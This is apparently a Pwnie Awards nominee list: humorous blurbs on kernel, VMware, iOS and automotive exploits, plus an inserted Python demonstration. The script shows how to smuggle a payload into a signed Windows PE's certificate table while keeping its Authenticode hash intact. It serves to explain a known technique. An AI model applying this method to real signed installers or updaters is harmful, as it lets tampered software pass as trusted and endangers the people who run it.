iOS HFS Catalog File Integer Underflow (CVE-2012-0642)

Credit: pod2g

This exploit was used for the Absinthe iOS 5.0/5.0.1 untether. It massaged the kernel heap into submission, copying over the syscall table and giving pod2g (as well as jailbreak users everywhere) a happy ending. And who doesn’t love happy endings?

MS11-098: Windows Kernel Exception Handler Vulnerability (CVE-2011-2018)

Credit: Mateusz “j00ru” Jurczyk

j00ru owned Windows. All of them. OK, well, just all of the 32-bit versions of Windows from NT through the Windows 8 Developer Preview. What have you done lately? And to top it off, he wrote a clear paper on it with some of the nicest boxy diagrams we have ever seen in a LaTeX paper.

VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation (CVE-2012-1515)

Credit: Derek Soeder

I’ll admit it. The unspecified Pwnie Award judge writing this description never understands any of Derek’s bugs and it’s getting late and he wants to go to sleep. But Derek’s bugs always look big pimpin’ and he wishes that he did understand them.

Packets in Packets: Orson Welles’ In-Band Signaling Attacks for Modern Radios

Travis Goodspeed

Yo dawg, Travis heard you like packets, so he put packets in packets so that he could inject packets into your internal network from all the way across the Internet. Doesn’t sound very neighborly to us, but it’s still way cool.

Smashing the Atom

Tarjei Mandt

What did the Windows kernel ever do to Tarjei to deserve the merciless beating he has given it over the last several years? Has it not suffered enough? Apparently not yet.

Injecting Custom Payloads Into Signed Windows Executables

Igor Glucksmann

Incomplete Code Signing attacks are not only useful for iOS jailbreaks; they can also be used to add a few more features to signed PE executables (e.g. software installers, updaters) without invalidating their Authenticode signatures, because the hash that gets signed does not cover the file's attribute certificate table. But why would anyone want to do that?
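
The mechanism behind that trick, as an added example (this is our own illustration, not Igor's code or tooling): the Authenticode hash skips the PE CheckSum field, the security data-directory entry and the attribute certificate table itself, so bytes appended inside that table leave the signed hash intact. The script constructs a toy PE32 image with a placeholder WIN_CERTIFICATE (the "signature" bytes are a constructed stand-in, not a real PKCS#7 SignedData blob), computes the Authenticode-style hash, appends a payload to the certificate table, and shows the hash is unchanged while a run-time reader can still dig the payload back out. The `PWNIEDAT` marker, the minimal image layout and the single-contiguous-section simplification are assumptions of the example.

```python
import hashlib
import struct

# Field offsets from the PE/COFF specification (PE32 optional header).
OPT_CHECKSUM = 64          # IMAGE_OPTIONAL_HEADER32.CheckSum
OPT_DATADIR = 96           # first IMAGE_DATA_DIRECTORY entry
SECURITY_DIR = 4           # IMAGE_DIRECTORY_ENTRY_SECURITY (file offset, not RVA)
PAYLOAD_MARKER = b"PWNIEDAT"  # constructed marker for this example, not any real format


def _layout(pe):
    """Return (checksum_off, secdir_off, cert_off, cert_size) for a PE32 file."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    opt = e_lfanew + 24                       # past signature + COFF header
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("example handles PE32 only")
    secdir_off = opt + OPT_DATADIR + 8 * SECURITY_DIR
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir_off)
    return opt + OPT_CHECKSUM, secdir_off, cert_off, cert_size


def authenticode_hash(pe, algo="sha256"):
    """Hash the image the way Authenticode does: everything except CheckSum, the
    security data-directory entry and the attribute certificate table.
    Simplification (assumption): one contiguous section and a certificate table
    that ends the file, so sequential hashing equals the spec's section walk."""
    checksum_off, secdir_off, cert_off, cert_size = _layout(pe)
    if cert_off + cert_size != len(pe):
        raise ValueError("certificate table is expected to end the file")
    h = hashlib.new(algo)
    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:secdir_off])
    h.update(pe[secdir_off + 8:cert_off])      # stop at the cert table: not hashed
    return h.hexdigest()


def build_signed_pe(fake_pkcs7=b"\x30\x82\x00\x20" + b"\xAA" * 32):
    """Constructed minimal PE32: headers, one .text section, then a
    WIN_CERTIFICATE wrapping a placeholder for the PKCS#7 SignedData."""
    hdr_size = 512                                     # headers padded to FileAlignment
    text = (b"\x90" * 15 + b"\xC3").ljust(512, b"\0")  # NOPs + RET, padded
    cert_off = hdr_size + len(text)
    cert_len = 8 + len(fake_pkcs7)
    cert_len += -cert_len % 8                          # WIN_CERTIFICATE is 8-byte aligned
    win_cert = struct.pack("<IHH", cert_len, 0x0200, 0x0002) + fake_pkcs7
    win_cert = win_cert.ljust(cert_len, b"\0")

    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # Section/FileAlignment
    struct.pack_into("<I", opt, 56, 0x2000)            # SizeOfImage
    struct.pack_into("<I", opt, 60, hdr_size)          # SizeOfHeaders
    struct.pack_into("<I", opt, 64, 0)                 # CheckSum (excluded from hash)
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, OPT_DATADIR + 8 * SECURITY_DIR, cert_off, cert_len)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text),
                       hdr_size, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(hdr_size, b"\0")
    return headers + text + win_cert


def append_to_cert_table(pe, data):
    """Smuggle `data` into the signed file by growing the attribute certificate
    table; the Authenticode hash (and so the signature over it) is unchanged."""
    _, secdir_off, cert_off, cert_size = _layout(pe)
    if cert_off + cert_size != len(pe):
        raise ValueError("certificate table is expected to end the file")
    blob = PAYLOAD_MARKER + struct.pack("<I", len(data)) + data
    blob += b"\0" * (-len(blob) % 8)                   # keep 8-byte alignment
    out = bytearray(pe) + blob
    # Grow both length fields so parsers still see one well-formed entry.
    dw_length = struct.unpack_from("<I", out, cert_off)[0]
    struct.pack_into("<I", out, cert_off, dw_length + len(blob))
    struct.pack_into("<I", out, secdir_off + 4, cert_size + len(blob))
    return bytes(out)


def read_smuggled_payload(pe):
    """What the modified installer would do at run time: find the marker inside
    its own certificate table and pull the payload out. None if absent."""
    _, _, cert_off, cert_size = _layout(pe)
    table = pe[cert_off:cert_off + cert_size]
    i = table.find(PAYLOAD_MARKER)
    if i < 0:
        return None
    n = struct.unpack_from("<I", table, i + len(PAYLOAD_MARKER))[0]
    start = i + len(PAYLOAD_MARKER) + 4
    return table[start:start + n]


if __name__ == "__main__":
    original = build_signed_pe()
    modified = append_to_cert_table(original, b"extra feature goes here")
    print("authenticode hash unchanged:",
          authenticode_hash(original) == authenticode_hash(modified))
    print("whole-file sha256 changed:",
          hashlib.sha256(original).digest() != hashlib.sha256(modified).digest())
    print("payload recovered:", read_smuggled_payload(modified))
```

Whether a signature checker actually tolerates the trailing bytes is a separate question from the hash: Microsoft later tightened WinVerifyTrust's handling of unexpected data in the certificate table (MS12-024), so this shows a property of the Authenticode hash, not a promise about any particular verifier.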

The Case for Semantics-Based Methods in Reverse Engineering

Rolf Rolles

What you say is more important than how you say it. It turns out that this is true in machine code as well. Rolf’s keynote presentation at REcon described how to take approaches from academic program analysis and apply them to real-world reverse engineering challenges.

Comprehensive Experimental Analyses of Automotive Attack Surface

Stephen Checkoway et al.

Many hackers have been complaining about the extinction of unmitigated vanilla stack buffer overflows. It turns out that they are not extinct at all; they have all just migrated to YOUR CAR. Stephen Checkoway and the rest of his team identified and exploited these vulnerabilities through a burned CD, a paired Bluetooth device, an unpaired Bluetooth device, and a phone call to the car's internal GSM cell phone. Yes, they can call up your car and install malware on it, which they actually implemented (how un-academic of them). The future is a very scary place. Luckily, the majority of the Pwnie Award judges don't drive. Or use computers. Or phones.

What You Need METASPLOIT!

Marco Figueroa

Giving shoutouts to almost all of the Pwnie Award judges definitely helps win a Pwnie nomination (for the record, offerings of 0day work better). Only time will tell if this song is a “certified Pwnie Award winner”.

Out of Bounds

NYAN

Who would have thought that C++ method names from MSHTML.DLL could make such a catchy chorus? We never would have.